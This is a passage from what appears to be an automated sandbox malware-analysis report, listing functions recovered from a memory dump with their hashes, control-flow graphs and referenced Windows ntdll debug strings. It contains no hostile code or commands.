                                                                          • Opcode Fuzzy Hash: 62563feab5bb6a61e812a2ba43c4d7fe21c35a2280d986245c81b7d922b48a10
                                                                          • Instruction Fuzzy Hash: 9190023164544847D14072584404A46101547E2345F55C012A1064A58D97298E59B661
                                                                          Function 36402BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4e6cd987209747bd5df249d7c0edfb1a30bed072881b0fd8c6d64396cd04387b
                                                                          • Instruction ID: e47e2a529251bfc4403017aed62e307199d6baa183da3d59cf5717a6a3eda0d7
                                                                          • Opcode Fuzzy Hash: 4e6cd987209747bd5df249d7c0edfb1a30bed072881b0fd8c6d64396cd04387b
                                                                          • Instruction Fuzzy Hash: 8B90023164140807D1807258440464A100547E3341F95C016A1025A18DCB198B5D77A1
                                                                          Function 36402B80 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5e330cdcc62f8a73d43af460f530cad6c6dc91f5b082b7503ea7a54bf111b281
                                                                          • Instruction ID: 68112a2981732014e35a125a163afe9d306d1c1c1a3e5c706f89166d45cb7807
                                                                          • Opcode Fuzzy Hash: 5e330cdcc62f8a73d43af460f530cad6c6dc91f5b082b7503ea7a54bf111b281
                                                                          • Instruction Fuzzy Hash: EB90023164140807D10472584804686100547E2341F55C012A7024A19E976989957131
                                                                          Function 36402BA0 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 03e3e92f1b1538fdd47109c52c65c7dc6af948940b2f2fa0cc1d60634e52b637
                                                                          • Instruction ID: dc0ce97a1971c664db945468d432647b29560365a339f67f545be0056dac5ec3
                                                                          • Opcode Fuzzy Hash: 03e3e92f1b1538fdd47109c52c65c7dc6af948940b2f2fa0cc1d60634e52b637
                                                                          • Instruction Fuzzy Hash: B0900231A4540807D15072584414746100547E2341F55C012A1024A18D87598B5976A1
                                                                          Function 36402C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                          • Instruction ID: 50d509fb022f261c47490fbb8a56ae7d077d8f032693dead7fe8211166fcc7ea
                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                          • Instruction Fuzzy Hash:
                                                                          Function 36402890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1125 36402890-364028b3 1126 364028b9-364028cc 1125->1126 1127 3643a4bc-3643a4c0 1125->1127 1129 364028dd-364028df 1126->1129 1130 364028ce-364028d7 1126->1130 1127->1126 1128 3643a4c6-3643a4ca 1127->1128 1128->1126 1132 3643a4d0-3643a4d4 1128->1132 1131 364028e1-364028e5 1129->1131 1130->1129 1133 3643a57e-3643a585 1130->1133 1134 36402988-3640298e 1131->1134 1135 364028eb-364028fa 1131->1135 1132->1126 1136 3643a4da-3643a4de 1132->1136 1133->1129 1139 36402908-3640290c 1134->1139 1137 36402900-36402905 1135->1137 1138 3643a58a-3643a58d 1135->1138 1136->1126 1140 3643a4e4-3643a4eb 1136->1140 1137->1139 1138->1139 1139->1131 1141 3640290e-3640291b 1139->1141 1142 3643a564-3643a56c 1140->1142 1143 3643a4ed-3643a4f4 1140->1143 1144 3643a592-3643a599 1141->1144 1145 36402921 1141->1145 1142->1126 1146 3643a572-3643a576 1142->1146 1147 3643a4f6-3643a4fe 1143->1147 1148 3643a50b 1143->1148 1157 3643a5a1-3643a5c9 call 36410050 1144->1157 1150 36402924-36402926 1145->1150 1146->1126 1151 3643a57c call 36410050 1146->1151 1147->1126 1152 3643a504-3643a509 1147->1152 1149 3643a510-3643a536 call 36410050 1148->1149 1165 3643a55d-3643a55f 1149->1165 1154 36402993-36402995 1150->1154 1155 36402928-3640292a 1150->1155 1151->1165 1152->1149 1154->1155 1160 36402997-364029b1 call 36410050 1154->1160 1162 36402946-36402966 call 36410050 1155->1162 1163 3640292c-3640292e 1155->1163 1174 36402969-36402974 1160->1174 1162->1174 1163->1162 1168 36402930-36402944 call 36410050 1163->1168 1171 36402981-36402985 1165->1171 1168->1162 1174->1150 1176 36402976-36402979 1174->1176 1176->1157 1177 3640297f 1176->1177 1177->1171
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                          • API String ID: 48624451-2108815105
                                                                          • Opcode ID: 169df4e8c5205a8aea5ea90811b5b7f7dfec87d9671df72a29e8741e05b037b1
                                                                          • Instruction ID: 6195043c5b1aab5237b184575bc2d8260ea12b8dc4affd266b69de249fe53173
                                                                          • Opcode Fuzzy Hash: 169df4e8c5205a8aea5ea90811b5b7f7dfec87d9671df72a29e8741e05b037b1
                                                                          • Instruction Fuzzy Hash: 5F51E9BAE00226BFEB11DF59888097FFBB8BB092447608279E454D7681D674DE50CFE0
                                                                          Function 36472410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1178 36472410-36472433 1179 364724ec-364724ff 1178->1179 1180 36472439-3647243d 1178->1180 1182 36472513-36472515 1179->1182 1183 36472501-3647250a 1179->1183 1180->1179 1181 36472443-36472447 1180->1181 1181->1179 1184 3647244d-36472451 1181->1184 1186 36472517-3647251b 1182->1186 1183->1182 1185 3647250c 1183->1185 1184->1179 1187 36472457-3647245b 1184->1187 1185->1182 1188 3647251d-3647252c 1186->1188 1189 36472538-3647253e 1186->1189 1187->1179 1190 36472461-36472468 1187->1190 1191 36472540 1188->1191 1192 3647252e-36472536 1188->1192 1193 36472543-36472547 1189->1193 1194 364724b6-364724be 1190->1194 1195 3647246a-36472471 1190->1195 1191->1193 1192->1193 1193->1186 1196 36472549-36472556 1193->1196 1194->1179 1201 364724c0-364724c4 1194->1201 1197 36472484 1195->1197 1198 36472473-3647247b 1195->1198 1199 36472564 1196->1199 1200 36472558-36472562 1196->1200 1203 36472489-364724ab call 36410510 1197->1203 1198->1179 1202 3647247d-36472482 1198->1202 1204 36472567-36472569 1199->1204 1200->1204 1201->1179 1205 364724c6-364724ea call 36410510 1201->1205 1202->1203 1216 364724ae-364724b1 1203->1216 1206 3647258d-3647258f 1204->1206 1207 3647256b-3647256d 1204->1207 1205->1216 1212 36472591-36472593 1206->1212 1213 364725ae-364725d0 call 36410510 1206->1213 1207->1206 1210 3647256f-3647258b call 36410510 1207->1210 1223 364725d3-364725df 1210->1223 1212->1213 1217 36472595-364725ab call 36410510 1212->1217 1213->1223 1222 36472615-36472619 1216->1222 1217->1213 1223->1204 1225 364725e1-364725e4 1223->1225 1226 364725e6-36472610 call 36410510 1225->1226 1227 36472613 1225->1227 1226->1227 1227->1222
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                          • API String ID: 48624451-2108815105
                                                                          • Opcode ID: 582cf4d6724dcc700659026644fda3ad1481015d03971a8e31e568ed7d4f0fe4
                                                                          • Instruction ID: 7d772238f71e7030b6183c07f44f7d41196e6488c2449105f31dda7a9440de51
                                                                          • Opcode Fuzzy Hash: 582cf4d6724dcc700659026644fda3ad1481015d03971a8e31e568ed7d4f0fe4
                                                                          • Instruction Fuzzy Hash: 95513775E00655AFEB20CF6CCC808BFBBF8EF44244B508859E4A5D3745EAB4EA00CB65
                                                                          Function 3649A670 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1427 3649a670-3649a6e9 call 363d2410 * 2 RtlDebugPrintTimes 1433 3649a89f-3649a8c4 call 363d25b0 * 2 call 36404c30 1427->1433 1434 3649a6ef-3649a6fa 1427->1434 1436 3649a6fc-3649a709 1434->1436 1437 3649a724 1434->1437 1439 3649a70b-3649a70d 1436->1439 1440 3649a70f-3649a715 1436->1440 1441 3649a728-3649a734 1437->1441 1439->1440 1443 3649a71b-3649a722 1440->1443 1444 3649a7f3-3649a7f5 1440->1444 1445 3649a741-3649a743 1441->1445 1443->1441 1447 3649a81f-3649a821 1444->1447 1448 3649a745-3649a747 1445->1448 1449 3649a736-3649a73c 1445->1449 1453 3649a755-3649a77d RtlDebugPrintTimes 1447->1453 1454 3649a827-3649a834 1447->1454 1448->1447 1451 3649a74c-3649a750 1449->1451 1452 3649a73e 1449->1452 1456 3649a86c-3649a86e 1451->1456 1452->1445 1453->1433 1467 3649a783-3649a7a0 RtlDebugPrintTimes 1453->1467 1457 3649a85a-3649a866 1454->1457 1458 3649a836-3649a843 1454->1458 1456->1447 1461 3649a87b-3649a87d 1457->1461 1459 3649a84b-3649a851 1458->1459 1460 3649a845-3649a849 1458->1460 1463 3649a96b-3649a96d 1459->1463 1464 3649a857 1459->1464 1460->1459 1465 3649a87f-3649a881 1461->1465 1466 3649a870-3649a876 1461->1466 1468 3649a883-3649a889 1463->1468 1464->1457 1465->1468 1469 3649a878 1466->1469 1470 3649a8c7-3649a8cb 1466->1470 1467->1433 1475 3649a7a6-3649a7cc RtlDebugPrintTimes 1467->1475 1472 3649a88b-3649a89d RtlDebugPrintTimes 1468->1472 1473 3649a8d0-3649a8f4 RtlDebugPrintTimes 1468->1473 1469->1461 1471 3649a99f-3649a9a1 1470->1471 1472->1433 1473->1433 1479 3649a8f6-3649a913 RtlDebugPrintTimes 1473->1479 1475->1433 1480 3649a7d2-3649a7d4 1475->1480 1479->1433 1487 3649a915-3649a944 RtlDebugPrintTimes 1479->1487 1481 3649a7f7-3649a80a 1480->1481 1482 3649a7d6-3649a7e3 1480->1482 1486 3649a817-3649a819 1481->1486 1484 3649a7eb-3649a7f1 1482->1484 1485 3649a7e5-3649a7e9 1482->1485 1484->1444 1484->1481 1485->1484 1488 3649a81b-3649a81d 1486->1488 1489 3649a80c-3649a812 1486->1489 1487->1433 1493 3649a94a-3649a94c 1487->1493 1488->1447 1490 3649a868-3649a86a 1489->1490 1491 3649a814 1489->1491 1490->1456 1491->1486 1494 3649a94e-3649a95b 1493->1494 1495 3649a972-3649a985 1493->1495 1496 3649a95d-3649a961 1494->1496 1497 3649a963-3649a969 1494->1497 1498 3649a992-3649a994 1495->1498 1496->1497 1497->1463 1497->1495 1499 3649a987-3649a98d 1498->1499 1500 3649a996 1498->1500 1501 3649a99b-3649a99d 1499->1501 1502 3649a98f 1499->1502 1500->1465 1501->1471 1502->1498
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: HEAP:
                                                                          • API String ID: 3446177414-2466845122
                                                                          • Opcode ID: 8252c0d2c85e52b3b32ea508bbd704fb4381aa82fdf8830e6a7c24ff7d6666c7
                                                                          • Instruction ID: ba0679ec1a52bd98ab44472522cb7967d6509bad57c6829c63c7179f617dadf4
                                                                          • Opcode Fuzzy Hash: 8252c0d2c85e52b3b32ea508bbd704fb4381aa82fdf8830e6a7c24ff7d6666c7
                                                                          • Instruction Fuzzy Hash: 2EA1DF75E443118FE709CE18C890A5ABBE6FF88354F19496DE945DB310EBB0EC86CB91
                                                                          Function 363F7630 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1503 363f7630-363f7651 1504 363f768b-363f7699 call 36404c30 1503->1504 1505 363f7653-363f766f call 363ce660 1503->1505 1510 363f7675-363f7682 1505->1510 1511 36434638 1505->1511 1512 363f769a-363f76a9 call 363f7818 1510->1512 1513 363f7684 1510->1513 1515 3643463f-36434645 1511->1515 1519 363f76ab-363f76c1 call 363f77cd 1512->1519 1520 363f7701-363f770a 1512->1520 1513->1504 1517 363f76c7-363f76d0 call 363f7728 1515->1517 1518 3643464b-364346b8 call 3644f290 call 36409020 RtlDebugPrintTimes BaseQueryModuleData 1515->1518 1517->1520 1528 363f76d2 1517->1528 1518->1517 1538 364346be-364346c6 1518->1538 1519->1515 1519->1517 1523 363f76d8-363f76e1 1520->1523 1530 363f770c-363f770e 1523->1530 1531 363f76e3-363f76f2 call 363f771b 1523->1531 1528->1523 1532 363f76f4-363f76f6 1530->1532 1531->1532 1536 363f76f8-363f76fa 1532->1536 1537 363f7710-363f7719 1532->1537 1536->1513 1540 363f76fc 1536->1540 1537->1536 1538->1517 1539 364346cc-364346d3 1538->1539 1539->1517 1541 364346d9-364346e4 1539->1541 1542 364347be-364347d0 call 36402c50 1540->1542 1543 364346ea-36434723 call 3644f290 call 3640aaa0 1541->1543 1544 364347b9 call 36404d48 1541->1544 1542->1513 1552 36434725-36434736 call 3644f290 1543->1552 1553 3643473b-3643476b call 3644f290 1543->1553 1544->1542 1552->1520 1553->1517 1558 36434771-3643477f call 3640a770 1553->1558 1561 36434781-36434783 1558->1561 1562 36434786-364347a3 call 3644f290 call 3643cf9e 1558->1562 1561->1562 1562->1517 1567 364347a9-364347b2 1562->1567 1567->1558 1568 364347b4 1567->1568 1568->1517
                                                                          Strings
                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 36434655
                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 364346FC
                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 36434787
                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 36434725
                                                                          • Execute=1, xrefs: 36434713
                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 36434742
                                                                          • ExecuteOptions, xrefs: 364346A0
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                          • API String ID: 0-484625025
                                                                          • Opcode ID: 9ba258aa2510dbb6ddedce3a2ef4a5040e99588769479f2bebe79a9ad2820831
                                                                          • Instruction ID: 418abc00199aa5ef830d5245660886baa3c78599648fb9043b956b4795a2db79
                                                                          • Opcode Fuzzy Hash: 9ba258aa2510dbb6ddedce3a2ef4a5040e99588769479f2bebe79a9ad2820831
                                                                          • Instruction Fuzzy Hash: 5B511975E103196AEB119F65FC89FED77B8EF08304F5000A9E504AB190DB72DA49CF61
                                                                          Function 363DA250 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 364279D5
                                                                          • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 36427AE6
                                                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 364279D0, 364279F5
                                                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 364279FA
                                                                          • Actx , xrefs: 36427A0C, 36427A73
                                                                          • SsHd, xrefs: 363DA3E4
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                          • API String ID: 0-1988757188
                                                                          • Opcode ID: cd5121f34e86f30740071ae15317894992d36ae979406a7ed5b8be6f5b29377b
                                                                          • Instruction ID: c79dde484a1c1635b64798a322865d1149ef96c8be2ffe370e5c8ca035a563de
                                                                          • Opcode Fuzzy Hash: cd5121f34e86f30740071ae15317894992d36ae979406a7ed5b8be6f5b29377b
                                                                          • Instruction Fuzzy Hash: 6DE1E576A04301CFE711CE2DCA84B5A77F5BB84364F604A2DE895CB390DBB1D949CB82
                                                                          Function 3643FD82 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                          • API String ID: 3446177414-4227709934
                                                                          • Opcode ID: 6965e242b6a68187af8fd3b39f3336945c6c9998521678663656b5bf1c65daa2
                                                                          • Instruction ID: f035558bf258a3e1570d33e091ce06c426eeb409bcd568fc3b3f1d8cbf316836
                                                                          • Opcode Fuzzy Hash: 6965e242b6a68187af8fd3b39f3336945c6c9998521678663656b5bf1c65daa2
                                                                          • Instruction Fuzzy Hash: AB417CB9E02309ABDB42DF99C881ADEBBB6FF48704F240119ED05A7341D771D921DBA0
                                                                          Function 3646FD78 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                          • API String ID: 3446177414-3492000579
                                                                          • Opcode ID: 376e4fb07ae9b5e9c3528b804386ce8610628bd94f53a78af774cc853f363d20
                                                                          • Instruction ID: 1555d7bc493b18d8d6b5602f24f80f044ce64cc65ac1495462ddcd5ef290e9a2
                                                                          • Opcode Fuzzy Hash: 376e4fb07ae9b5e9c3528b804386ce8610628bd94f53a78af774cc853f363d20
                                                                          • Instruction Fuzzy Hash: C871DD75D11788DFDB06CF6AD8806ADBBF2FF4A318F04805AE481AB751CB359981CB91
                                                                          Function 363B65B5 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 36419AC5, 36419B06
                                                                          • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36419AB4
                                                                          • LdrpLoadShimEngine, xrefs: 36419ABB, 36419AFC
                                                                          • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36419AF6
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 3446177414-3589223738
                                                                          • Opcode ID: 9a52c88cea369feac7cff516ab92fa4d009f23b83d332a8a6f15eeb7a52c3866
                                                                          • Instruction ID: b1947be1c3d1245506d57763928bd9a629be8333c593c5cada32abc890685197
                                                                          • Opcode Fuzzy Hash: 9a52c88cea369feac7cff516ab92fa4d009f23b83d332a8a6f15eeb7a52c3866
                                                                          • Instruction Fuzzy Hash: 6251F136E503589FDF04DFA8CC94B9D7BA6BB46704F040129E581BB286DBB0DC65CB91
                                                                          Function 363E9803 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 179timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: @3K6$LdrpUnloadNode$Unmapping DLL "%wZ"$dfK6@3K6@3K6$minkernel\ntdll\ldrsnap.c
                                                                          • API String ID: 3446177414-648166177
                                                                          • Opcode ID: abd4f80b92343367d9d9a5ac9e78314672330b1565f94b45659ee6152d761a52
                                                                          • Instruction ID: 59ce6bfb5842c87d3da6019e040014ac98aa1953b321cf6753dd1eecc3c18762
                                                                          • Opcode Fuzzy Hash: abd4f80b92343367d9d9a5ac9e78314672330b1565f94b45659ee6152d761a52
                                                                          • Instruction Fuzzy Hash: C3510373A007219FE715DF35CC80B1AB7A5BB84314F14062DE9D59B2E0EB74E819CBA2
                                                                          Function 363EDB00 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
